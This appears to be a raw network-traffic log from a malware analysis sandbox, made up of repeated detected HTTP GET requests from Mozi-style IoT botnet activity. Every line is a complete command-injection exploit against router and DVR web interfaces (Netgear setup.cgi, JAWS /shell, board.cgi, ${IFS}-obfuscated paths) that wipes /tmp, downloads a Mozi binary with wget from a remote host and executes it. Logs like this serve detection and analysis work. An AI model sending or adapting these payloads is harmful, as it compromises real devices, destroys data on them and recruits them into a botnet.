                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 84.119.107.118:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 193.34.214.53:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 39.227.72.155:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 78.126.194.179:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 156.82.219.223:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 5.66.245.147:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 99.207.247.232:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 67.239.51.13:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 53.247.144.247:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 218.131.151.144:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 102.194.156.24:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 42.222.208.96:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 198.31.34.13:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 40.104.249.146:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 3.102.151.229:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 72.121.179.235:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 1.22.227.114:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 220.207.0.34:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 110.132.229.55:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 32.37.204.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 112.164.49.42:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 21.184.171.120:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 118.165.85.54:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
